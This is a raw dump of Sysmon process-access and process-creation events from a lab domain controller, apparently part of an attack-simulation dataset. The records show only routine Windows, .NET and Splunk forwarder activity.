13:49:48.338{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-5D03-00000000A301}1068C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007696Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.250{59A5CD1D-91FC-6005-5B03-00000000A301}47721336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007695Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.250{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FC-6005-5C03-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007694Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.249{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5C03-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007693Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.248{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-91FC-6005-5C03-00000000A301}3732C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007692Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007691Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007690Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007689Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007688Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007687Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007686Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007685Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007684Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007683Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007682Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007681Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007680Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:48.120{59A5CD1D-91FC-6005-5B03-00000000A301}4772C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007679Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:47.995{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FB-6005-5A03-00000000A301}3376C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007738Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.917{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91FD-6005-6303-00000000A301}1556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007737Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-91FD-6005-6203-00000000A301}4584C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007736Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007735Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007734Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007733Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:49:49.901{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007732Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 